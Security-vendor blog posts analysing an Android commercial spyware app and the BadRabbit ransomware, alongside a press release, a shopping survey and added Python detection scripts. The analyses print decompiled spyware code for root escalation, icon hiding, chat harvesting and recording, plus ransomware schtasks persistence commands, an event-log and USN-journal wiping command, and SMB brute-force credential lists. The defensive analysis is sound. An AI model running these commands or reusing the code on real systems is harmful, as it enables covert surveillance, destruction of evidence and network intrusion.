Sophisticated Commercial Spyware Puts User Data at Risk

Trojan spyware can eavesdrop on a user’s device to secretly steal information. Some commercial spyware apps market themselves as benign parental control or monitoring tools. These apps normally require manual installation and are often sold on underground hacker websites. In many cases, the data they collect is stored on servers the user cannot access, and sometimes that unprotected data is leaked, putting the user’s privacy at risk. Trustlook Labs has detected a commercial spyware app that collects a large amount of user information, including call logs, chat logs, and SMS messages, from devices across the world.

The spyware app has the following specifications:

  • MD5: 0cb7ff97e8800d4a794ed0b4402a395d
  • SHA256: 03ea783659565b3e15e2d0c461c31fda4173214151de7b01a4b04403a38a34ba
  • Size: 765214 bytes
  • App name: Android PicoTTS
  • Package name: com.procses.acores

The app needs to be installed manually, so it asks the user to activate it as a device administrator:

[screenshot: device administrator activation prompt]

The app provides step-by-step settings for the user to choose from:

[screenshot: step-by-step settings screen]

If the user grants root privileges (the code tries both an "su" and a "zlsu" binary), the app remounts /system read-write, installs itself as a system app, and copies its native libraries into /system/lib with the setuid bit set. This makes it much harder to uninstall:

    public static boolean a(String str) {
        boolean b = a ? a("zlsu", str) == 0 : b(str);
        Log.i(c, a ? "zlsu " : "su " + str + ":" + String.valueOf(b));
        return b;
    }
    public static boolean a(boolean z) {
        String str = "su";
        if (z) {
            str = "zlsu";
        }
        return (!z || new File("/system/bin/" + str).exists()) && a(str, "exit") == 0;
    }
[]
    public static boolean b(Context context) {
        int i = 0;
        String str = context.getPackageName() + ".apk";
        String f = f(context);
        if (f == null) {
            return false;
        }
        File file = new File(f);
        File file2 = new File(new StringBuilder(String.valueOf(context.getFilesDir().getParent())).append("/lib/").toString());
        a("mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system");
        if (file2.exists() && file2.isDirectory()) {
            File[] listFiles = file2.listFiles();
            if (listFiles.length > 0) {
                a("chmod 777 /system/lib");
                int length = listFiles.length;
                while (i < length) {
                    File file3 = listFiles[i];
                    if (!file3.isDirectory()) {
                        b(file3.getPath(), "/system/lib/");
                        a("chmod 4755  /system/lib/" + file3.getName());
                        a("chown 1000:1000  /system/lib/" + file3.getName());
                    }
                    i++;
                }
            }
        } 
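As an added forensic check (not code from the original post), the following Python script parses a constructed `ls -l /system/lib` listing and flags shared libraries carrying the setuid bit, the artifact the "chmod 4755" above leaves behind. The listing layout, the library names and the helper names are assumptions.

```python
import re

# Constructed `ls -l /system/lib` listing in toybox layout (assumed; library
# names are made up). The spyware's installer copies its own .so files here
# and runs "chmod 4755" / "chown 1000:1000" on them, so a setuid shared
# library owned by uid 1000 (shown as "system") is the artifact to look for.
SAMPLE_LISTING = """\
-rw-r--r-- 1 root   root   214856 2017-01-01 00:00 libandroid.so
-rw-r--r-- 1 root   root    98712 2017-01-01 00:00 libbinder.so
-rwsr-xr-x 1 system system  61532 2017-11-20 09:12 libpicotts_jni.so
-rwsr-xr-x 1 system system  18740 2017-11-20 09:12 libacores.so
drwxr-xr-x 2 root   root     4096 2017-01-01 00:00 hw
"""

# Type char plus nine permission chars, e.g. "-rwsr-xr-x".
_PERM_RE = re.compile(r"^[-dl][rwxsStT-]{9}$")

def parse_ls_line(line):
    """Return (perms, owner, group, name) for one `ls -l` line, else None.

    Accepts both the toybox layout (link count in field 2) and the older
    toolbox layout (no link count) by testing whether field 2 is numeric.
    """
    fields = line.split()
    if len(fields) < 6 or not _PERM_RE.match(fields[0]):
        return None
    if fields[1].isdigit():
        owner, group = fields[2], fields[3]   # toybox: perms links owner group
    else:
        owner, group = fields[1], fields[2]   # toolbox: perms owner group
    return fields[0], owner, group, fields[-1]

def is_setuid(perms):
    """True when the owner-execute slot carries the setuid bit (s or S)."""
    return perms[3] in ("s", "S")

def find_setuid_libs(listing):
    """Regular files in the listing that are setuid, as (name, owner, group).

    A shared library has no business being setuid; on a device matching this
    sample, such files in /system/lib are candidates for the dropped libraries.
    """
    hits = []
    for line in listing.splitlines():
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        perms, owner, group, name = parsed
        if perms[0] == "-" and is_setuid(perms):
            hits.append((name, owner, group))
    return hits

if __name__ == "__main__":
    for name, owner, group in find_setuid_libs(SAMPLE_LISTING):
        print(f"setuid library: {name} ({owner}:{group})")
```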

The malware hides its launcher icon by disabling its own MainActivity component (setComponentEnabledSetting with state 2, COMPONENT_ENABLED_STATE_DISABLED, and flag 1, DONT_KILL_APP):

final class w
  implements DialogInterface.OnClickListener
{
  w(MainActivity paramMainActivity, Context paramContext) {}
  
  public final void onClick(DialogInterface paramDialogInterface, int paramInt)
  {
    if (paramInt == -1) {}
    try
    {
      this.b.getPackageManager().setComponentEnabledSetting(new ComponentName(this.b, "com.procses.acores.MainActivity"), 2, 1);
      a.b(this.b);
[]

The app is capable of collecting information from popular chat apps in China, such as:

  • 易信 (Yixin)
  • 微信 (WeChat)
  • QQ
  • HD QQ
  • WhatsApp
  • 陌陌 (MOMO messenger)
  • YY

The following code collects WeChat voice message files by walking the "voice" and "voice2" subdirectories under /tencent/MicroMsg on external storage:

public final class bc
{
  static String a = "/tencent/MicroMsg";
  static ArrayList b;
  
  static
  {
    ArrayList localArrayList = new ArrayList();
    b = localArrayList;
    localArrayList.add("Download");
    b.add("Game");
    b.add("locallog");
    b.add("vusericon");
    b.add("wallet");
    b.add("watchdog");
    b.add("WeiXin");
    b.add("xlog");
  }
  
  public static ArrayList a()
  {
    Object localObject = new File(Environment.getExternalStorageDirectory().getPath() + a);
    ArrayList localArrayList1 = new ArrayList();
    ArrayList localArrayList2;
    int i;
    if (((File)localObject).exists())
    {
      localObject = ((File)localObject).listFiles(new bd());
      localArrayList2 = new ArrayList();
      int j = localObject.length;
      i = 0;
      if (i < j) {
        break label96;
      }
      localObject = localArrayList2.iterator();
    }
    for (;;)
    {
      if (!((Iterator)localObject).hasNext())
      {
        return localArrayList1;
        label96:
        String str2 = localObject[i];
        String str1 = str2.getPath() + "/voice";
        str2 = str2.getPath() + "/voice2";
        if (new File(str1).exists()) {
          localArrayList2.add(str1);
        }
        if (new File(str2).exists()) {
          localArrayList2.add(str2);
        }
        i += 1;
        break;
      }
      localArrayList1.addAll(a(new File((String)((Iterator)localObject).next()), new be()));
    }
  }
  
[]
  public final void onCallStateChanged(int paramInt, String paramString)
  {
    Date localDate = new Date();
    new SimpleDateFormat("yyyyMMddHHmmss").format(localDate);
    switch (paramInt)
    {
    default: 
[]
    case 2: 
      g.a(this.a, "Look_CallLog", k.b);
      return;
    }
    g.a(this.a, "Look_CallLog", k.d);
    g.g = paramString;
  }

The app can also take screenshots, using the following code:

        String format = this.e.format(new Date());
        String runing2 = MyClass.getRuning2(this.a);
        Log.i(this.f, runing2);
        if (this.g.containsKey(runing2)) {
            runing2 = "/data/data/" + this.c.getPackageName() + "/screencap";
            String stringBuilder = new StringBuilder(String.valueOf(SmsService.a(aq.d))).append(format).toString();
            try {
                if (MyClass.SavePic(this.c, runing2, stringBuilder, Integer.parseInt(PreferenceManager.getDefaultSharedPreferences(this.c).getString("picQuality", "5"))) && new File(stringBuilder).exists()) {
                    int a;
[]
                    options.inPreferredConfig = Config.ARGB_8888;
                    options.inSampleSize = 1;
                    if (!(i == 0 || i2 == 0)) {
                        options.inSampleSize = ((i / 15) + (i2 / 15)) / 2;
                    }
                    options.inJustDecodeBounds = false;
                    Bitmap decodeFile = BitmapFactory.decodeFile(stringBuilder, options);

The following code records audio through MediaRecorder:

public class RecordPhone2
  extends IRecordPhone
{
  private static MediaRecorder recorder;
  int Audio_source;
  Context ct;
  String tag = "RecordPhone2";
  
  public RecordPhone2(int paramInt)
  {
    this.Audio_source = paramInt;
  }
  
  private void releaseMediaRecorder()
  {
    if ((recorder == null) || (recording)) {}
    for (;;)
    {
      try
      {
        Log.i(this.tag, "releaseMediaRecorder");
        recorder.stop();
        recording = false;
        recorder.reset();
        recorder.release();
        recorder = null;
        return;
      }
[]
      }

The following code reads queued records (uploaded=0) from the app’s own SQLite "upload" table before sending them to the server:

public final class b
{
  static String a = "upload";
  static String b = "Database";
  
  public static ArrayList a(Context paramContext)
  {
    ArrayList localArrayList = new ArrayList();
    try
    {
      paramContext = paramContext.openOrCreateDatabase(paramContext.getPackageName(), 0, null);
      Cursor localCursor = paramContext.query("upload", new String[] { "id", "smstype", "needDel", "ext", "title", "body", "filename", "uploaded", "date" }, "uploaded=?", new String[] { "0" }, null, null, "id");
      for (;;)
      {
        if (!localCursor.moveToNext())
        {
          localCursor.close();
          paramContext.close();
          return localArrayList;
        }
        c localc = new c();
        localc.d = localCursor.getInt(localCursor.getColumnIndex("id"));
        localc.i = localCursor.getString(localCursor.getColumnIndex("smstype"));
        localc.a = localCursor.getString(localCursor.getColumnIndex("title"));
        localc.g = localCursor.getString(localCursor.getColumnIndex("ext"));
        localc.b = localCursor.getString(localCursor.getColumnIndex("body"));
        localc.e = localCursor.getString(localCursor.getColumnIndex("filename"));
        localc.c = localCursor.getString(localCursor.getColumnIndex("uploaded"));
        localc.f = localCursor.getString(localCursor.getColumnIndex("date"));
        localc.h = localCursor.getInt(localCursor.getColumnIndex("needDel"));
        localArrayList.add(localc);
      }
      return localArrayList;
    }
    catch (Exception paramContext) {}
  }
  
[]
      localContentValues.put("needDel", Integer.valueOf(i));
      localContentValues.put("date", DateTimeHelper.FormatDateString(new Date()));
      paramContext.insert("upload", null, localContentValues);
      paramContext.close();
      return;
    }
    catch (Exception paramContext) {}
  }

The developer/vendor communicates with the buyer over QQ (an instant messaging app). After the user buys a registration code, the app is activated. The status strings below are Chinese: "注册成功" is "registration successful", "注册失败" is "registration failed", "软件已被取消激活" is "the software has been deactivated", and "当前授权时间至" is "authorized until":

    public static boolean a(Context context, String str) {
        String a = ab.a(context);
        String a2 = ab.a(a, str);
        if (!(str == null || str == "")) {
            if (MyClass.isValidDate(a2) != null) {
                ab.a(context, "JerryRegisterCode_Key2", str, ar.i, a);
                if (a2.equals(ab.a)) {
                    SmsService.b(context, "软件已被取消激活", "╠㊣╣" + ar.a + ",当前授权时间至:" + a2);
                } else {
                    SmsService.b(context, "注册成功", "╠㊣╣" + ar.a + ",当前授权时间至:" + a2);
                }
            } else {
                SmsService.b(context, "注册失败", "未注册" + ar.a + ",注册码有误,注册不成功。提交注册码为:" + str + " 机器码为:" + ab.a(context));
            }
        }
        return true;
    }

Summary
Commercial spyware apps can be used for legitimate purposes, but when put in the wrong hands, they can be effective attack tools against innocent people. These apps are often installed silently, and can take full control of a mobile device. This lets potential attackers monitor the user’s activities remotely. Trustlook’s anti-threat platform can effectively protect users against these threats.

Trustlook Selected for Top 10 Cybersecurity Solution Providers


Trustlook is honored and excited to be selected as a Top 10 Cybersecurity Solution Provider by The Technology Headlines. This list is published yearly, and is considered by many to be the definitive list of the world’s hottest and most innovative companies in the cybersecurity industry. This year’s list includes the following ten cybersecurity leaders:

  • Aizoon
  • BAE Systems
  • Booz Allen Hamilton
  • CyberArk
  • FireEye
  • OnBoard Security
  • Palo Alto Security
  • RSA Security
  • Secure Works
  • Trustlook

Trustlook has built a reputation for reliable cybersecurity products that are based on artificial intelligence. Our innovative SECUREai engine delivers the performance and scalability needed to provide total threat protection against malware and other forms of attack. We have products for consumers, app developers, OEMs, systems integrators, and large enterprises. We protect mobile phones, network appliances, and IoT devices.

To read the article from The Technology Headlines, please go here. To learn more about Trustlook or to schedule a demo, please visit www.trustlook.com.


Better Security to Drive Increase in Mobile Holiday Shopping

Shopping on mobile devices is expected to be strong during the 2017 Holiday Season, according to a new report from Trustlook. Faster network speeds, slick shopping apps, and, perhaps most significantly, the feeling of security among device owners are helping to drive this expected uptick in mobile shopping.

Continued updates to iOS and Android operating systems, as well as the proliferation of free mobile security apps, have contributed to a more secure mobile environment. Android, for instance, which represents the majority of mobile malware, is seeing fewer malware incidents, while more hackers than ever are reporting Android bugs to Google in exchange for so-called “bug bounties.”

“What jumped out the most in our study was the feeling of security between shoppers and non-shoppers,” said Allan Zhang, co-founder and CEO of Trustlook, a cybersecurity company that offers a chip-level security solution for mobile devices. “Those who feel secure on their device will shop and spend much more than those who don’t. It’s that simple.”

For the first time ever, mobile visits to retailers’ websites are expected to surpass desktop visits during the months of November and December. Still, experts warn that mobile shoppers need to be cautious, as the risk isn’t going away. “The bad guys go to where the activity is, and the activity is on mobile,” said Zhang.

Some key findings from Trustlook’s survey include:
1. 66% of users surveyed will shop on a mobile device this Holiday Season.
2. 45% of users surveyed will spend more than $250 on purchases made through a mobile device.
3. Over 80% of expected mobile shoppers either “Strongly Agreed” or “Agreed” with feeling secure, whereas for non-shoppers, the percentage was just over 50%.
4. The Home Electronics and Clothing categories are expected to see the bulk of purchases.

To see an infographic of Trustlook’s survey findings, go here. For more information on Trustlook and their AI-powered SECUREai cybersecurity platform, please visit http://www.trustlook.com.


“BadRabbit” Ransomware Hits Businesses Across Europe

Trustlook Labs has investigated a ransomware outbreak dubbed “BadRabbit,” which is sweeping public organizations and businesses such as airports, banks and power utilities in Russia, Ukraine, Turkey and Bulgaria.

The malware masquerades as an Adobe Flash Player installer that the user downloads from a phishing website. The dropper (MD5: fbbdc39af1139aebba4da004475e8839) writes a DLL module to C:\Windows\infpub.dat, which is the main BadRabbit payload, and runs it as "C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15". The disassembly below shows the dropper building that command line:

0119138A  |TEST CX,CX
0119138D  \JNZ SHORT BR.01191380
0119138F  PUSH 30C                                 ; /BufSize = 30C (780.)
01191394  LEA ECX,DWORD PTR SS:[EBP-61C]           ; |
0119139A  PUSH ECX                                 ; |Buffer
0119139B  CALL DWORD PTR DS:[]                     ; \GetSystemDirectoryW
011913A1  TEST EAX,EAX
011913A3  JE BR.01191487
011913A9  PUSH BR.01196CF8                         ; /StringToAdd = "\rundll32.exe"
011913AE  LEA EDX,DWORD PTR SS:[EBP-61C]           ; |
011913B4  PUSH EDX                                 ; |ConcatString
011913B5  CALL DWORD PTR DS:[]                     ; \lstrcatW
011913BB  TEST EAX,EAX
011913BD  JE BR.01191487
011913C3  LEA EAX,DWORD PTR SS:[EBP-1258]
011913C9  PUSH EAX                                 ; /Arg1
011913CA  LEA ECX,DWORD PTR SS:[EBP-1254]          ; |
011913D0  CALL BR.011910C0                         ; \BR.011910C0
011913D5  TEST EAX,EAX
011913D7  JE BR.01191487
011913DD  MOV ECX,DWORD PTR SS:[EBP-1258]
011913E3  PUSH EBX
011913E4  MOV EBX,DWORD PTR SS:[EBP-1254]
011913EA  PUSH ECX                                 ; /Arg1
011913EB  CALL BR.01191260                         ; \BR.01191260
011913F0  POP EBX
011913F1  TEST EAX,EAX
011913F3  JE BR.01191487
011913F9  LEA EDX,DWORD PTR SS:[EBP-124C]
011913FF  PUSH EDX                                 ; /
01191400  PUSH BR.01196D40                         ; | = "infpub.dat"
01191405  LEA EAX,DWORD PTR SS:[EBP-61C]           ; |
0119140B  PUSH EAX                                 ; |
0119140C  LEA ECX,DWORD PTR SS:[EBP-C34]           ; |
01191412  PUSH BR.01196D58                         ; |Format = "%ws C:\Windows\%ws,#1 %ws"
01191417  PUSH ECX                                 ; |s
01191418  CALL DWORD PTR DS:[]                     ; \wsprintfW

The malware also drops the files "C:\Windows\dispci.exe" and "C:\Windows\cscc.dat". It then creates scheduled tasks (named "rhaegal" and "drogon" in the strings below) to execute dispci.exe, which installs a malicious bootloader:

6C561077  PUSH DWORD PTR SS:[EBP+8]
6C56107A  PUSH EAX
6C56107B  LEA EAX,DWORD PTR SS:[EBP-618]
6C561081  PUSH infpub.6C570028                            ; UNICODE "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u "
6C561086  PUSH EAX
6C561087  CALL DWORD PTR DS:[]         ; USER32.wsprintfW

[...]

6C5682BB  LEA EAX,DWORD PTR SS:[EBP-658]
6C5682C1  PUSH EAX
6C5682C2  LEA EAX,DWORD PTR SS:[EBP-E58]
6C5682C8  PUSH infpub.6C571820                            ; UNICODE "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00"
6C5682CD  PUSH EAX
6C5682CE  CALL DWORD PTR DS:[]         ; USER32.wsprintfW
6C5682D4  ADD ESP,14

The malware generates a random key by calling "CryptGenRandom", then encrypts that key with an embedded RSA-2048 public key:

[screenshot: key generation and RSA-2048 key encryption routine]

The key is then used to encrypt files on the system with AES-128. The malware encrypts files with the following extensions:

.3ds, .7z, .accdb, .ai, .asm, .asp, .aspx, .avhd, .back, .bak, .bmp, .brw, .c, .cab, .cc, .cer, .cfg, .conf, .cpp, .crt, .cs, .ctl, .cxx, .dbf, .der, .dib, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz, .h, .hdd, .hpp, .hxx, .iso, .java, .jfif, .jpe, .jpeg, .jpg, .js, .kdbx, .key, .mail, .mdb, .msg, .nrg, .odc, .odf, .odg, .odi, .odm, .odp, .ods, .odt, .ora, .ost, .ova, .ovf, .p12, .p7b, .p7c, .pdf, .pem, .pfx, .php, .pmf, .png, .ppt, .pptx, .ps1, .pst, .pvi, .py, .pyc, .pyw, .qcow, .qcow2, .rar, .rb, .rtf, .scm, .sln, .sql, .tar, .tib, .tif, .tiff, .vb, .vbox, .vbs, .vcb, .vdi, .vfd, .vhd, .vhdx, .vmc, .vmdk, .vmsd, .vmtm, .vmx, .vsdx, .vsv, .work, .xls, .xlsx, .xml, .xvd, .zip

The malware skips the files under the following directories:

\Windows
\Program Files
\ProgramData
\AppData

The ransom message, "Readme.txt", is written to the root of each drive.

After the scheduled task reboots the system, the following ransom note is shown on the system:

[screenshot: ransom note displayed after reboot]

The malware runs "wevtutil" and "fsutil" commands to clear the event logs and delete the NTFS USN change journal:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
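To turn the scheduled-task creation and the log clearing above into detection logic, here is an added Python example (not from the original post or the sample) that runs a few command-line rules over constructed process-creation events. The event shape, host names, rule names and the "-id" value are assumptions, and the drogon task’s /TR value is a placeholder because the post does not show it.

```python
import re

# Constructed process-creation events (host + command line), in the shape a
# Sysmon/EDR feed gives after normalisation. The ws01 lines mirror the command
# strings recovered from the BadRabbit sample above (host names, the cmd path
# and the drogon /TR value are placeholders); the ws02 lines are ordinary
# admin work, included to show that the rules stay quiet on it.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmd": r"C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15"},
    {"host": "ws01", "cmd": r'schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal '
                            r'/TR "<cmd> /C Start \"\" \"C:\Windows\dispci.exe\" -id 1234 "'},
    {"host": "ws01", "cmd": r'schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "<reboot command>" /ST 14:25:00'},
    {"host": "ws01", "cmd": r"wevtutil cl Setup & wevtutil cl System & wevtutil cl Security "
                            r"& wevtutil cl Application & fsutil usn deletejournal /D C:"},
    {"host": "ws02", "cmd": r"schtasks /Create /SC DAILY /TN BackupJob /TR C:\Tools\backup.exe /ST 02:00"},
    {"host": "ws02", "cmd": r"wevtutil qe Application /c:5"},
]

# Each rule keys on an artefact the analysis recovered: the rundll32 export
# call, the task names, the dispci.exe task action, and the wevtutil/fsutil cleanup.
RULES = [
    ("badrabbit_payload_launch", re.compile(r"rundll32(\.exe)?\s+\S*infpub\.dat,#1\b", re.I)),
    ("badrabbit_task_names", re.compile(r"schtasks\s+/create\b.*\s/tn\s+(rhaegal|drogon)\b", re.I)),
    ("task_launches_dispci", re.compile(r"schtasks\s+/create\b.*dispci\.exe", re.I)),
    ("event_log_cleared", re.compile(r"wevtutil(\.exe)?\s+cl\b", re.I)),
    ("usn_journal_deleted", re.compile(r"fsutil(\.exe)?\s+usn\s+deletejournal\b", re.I)),
]

def match_rules(cmd):
    """Names of all rules whose pattern occurs in one command line."""
    return [name for name, rx in RULES if rx.search(cmd)]

def detect(events):
    """Return (per-event (host, rule names) hits, hosts to escalate).

    A host is escalated when two or more distinct rules fire on it: task
    creation followed by clearing every event log and the USN journal is the
    sequence the sample performs and is unlikely to be routine admin work.
    """
    hits, per_host = [], {}
    for ev in events:
        names = match_rules(ev["cmd"])
        if names:
            hits.append((ev["host"], names))
            per_host.setdefault(ev["host"], set()).update(names)
    escalated = sorted(h for h, rules in per_host.items() if len(rules) >= 2)
    return hits, escalated

if __name__ == "__main__":
    hits, escalated = detect(SAMPLE_EVENTS)
    for host, names in hits:
        print(host, ", ".join(names))
    print("escalate:", escalated)
```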

The malware also attempts to infect other systems on the network, using the following embedded usernames and passwords to brute-force logins over SMB.

Usernames:
alex
netguest
superuser
nasadmin
nasuser
nas
ftpadmin
ftpuser
asus
backup
operator
other user
work
support
manager
rdpadmin
rdpuser
rdp
ftp
boss
buh
root
Test
user-1
User1
User
Guest
Admin
Administrator

Passwords:
god
sex
secret
love
321
123321
uiop
zxcv
zxc321
zxc123
zxc
qwerty123
qwerty
qwert
qwer
qwe321
qwe123
qwe
777
77777
55555
111111
password
test123
admin123Test
Admin123
user123
User123
guest123
Guest123
administrato
Administrato
1234567890
123456789
12345678
1234567
123456
12345
1234
123
test
adminTest
user
guest
administrator
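As an added example, not part of the original analysis, the following Python detector flags the SMB password-spraying pattern this credential list produces: one source host failing logons with several of the embedded usernames against more than one target inside a short window. The event layout, host names, thresholds and the username subset are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Subset of the usernames embedded in the sample (from the list above); the
# full list drops in unchanged. Matching is case-insensitive.
BADRABBIT_USERNAMES = {"alex", "netguest", "superuser", "nasadmin", "nasuser",
                       "ftpadmin", "ftpuser", "rdpadmin", "rdpuser", "buh",
                       "backup", "operator", "admin", "administrator", "guest"}

# Constructed failed-logon records (a normalised Event ID 4625 / SMB auth
# failure): timestamp, source host, target host, account name. Host names
# are placeholders.
SAMPLE_FAILURES = [
    ("2017-10-24 13:01:02", "ws01", "fs01", "alex"),
    ("2017-10-24 13:01:03", "ws01", "fs01", "netguest"),
    ("2017-10-24 13:01:05", "ws01", "fs02", "superuser"),
    ("2017-10-24 13:01:06", "ws01", "fs02", "nasadmin"),
    ("2017-10-24 13:01:08", "ws01", "fs01", "ftpadmin"),
    ("2017-10-24 13:02:10", "ws07", "fs01", "jdoe"),   # mistyped password
    ("2017-10-24 13:40:00", "ws07", "fs01", "Admin"),  # one stray attempt
]

def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")

def detect_spray(failures, window=timedelta(minutes=5), min_accounts=4, min_targets=2):
    """Flag source hosts that, inside one window, fail logons with at least
    min_accounts distinct embedded usernames against at least min_targets
    hosts. Returns {source: (accounts, targets)} for flagged sources."""
    by_source = defaultdict(list)
    for ts, src, dst, user in failures:
        by_source[src].append((parse_ts(ts), dst, user.lower()))
    flagged = {}
    for src, events in by_source.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):
            accounts, targets = set(), set()
            for ts, dst, user in events[i:]:
                if ts - start > window:
                    break
                if user in BADRABBIT_USERNAMES:
                    accounts.add(user)
                    targets.add(dst)
            if len(accounts) >= min_accounts and len(targets) >= min_targets:
                flagged[src] = (sorted(accounts), sorted(targets))
                break
    return flagged

if __name__ == "__main__":
    for src, (accounts, targets) in detect_spray(SAMPLE_FAILURES).items():
        print(f"{src}: {len(accounts)} embedded usernames against {targets}")
```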

Hashes (MD5)
Trustlook Labs has identified the following hashes associated with BadRabbit:

Dropper:
fbbdc39af1139aebba4da004475e8839

Payload:
1d724f95c61f1055f0d02c2154bbccd3 c:\Windows\infpub.dat
b14d8faf7f0cbcfad051cefe5f39645f c:\Windows\dispci.exe
b4e6d97dafd9224ed9a547d52c26ce02 c:\Windows\cscc.dat

Summary
The ability to spread via SMB makes BadRabbit particularly destructive, as it can infect systems across a network quickly and easily. It is further proof that ransomware, with its monetary incentives, remains the dominant trend in malware developed by criminal hackers. Thankfully, Trustlook’s antivirus engine can effectively detect ransomware attacks and protect our customers.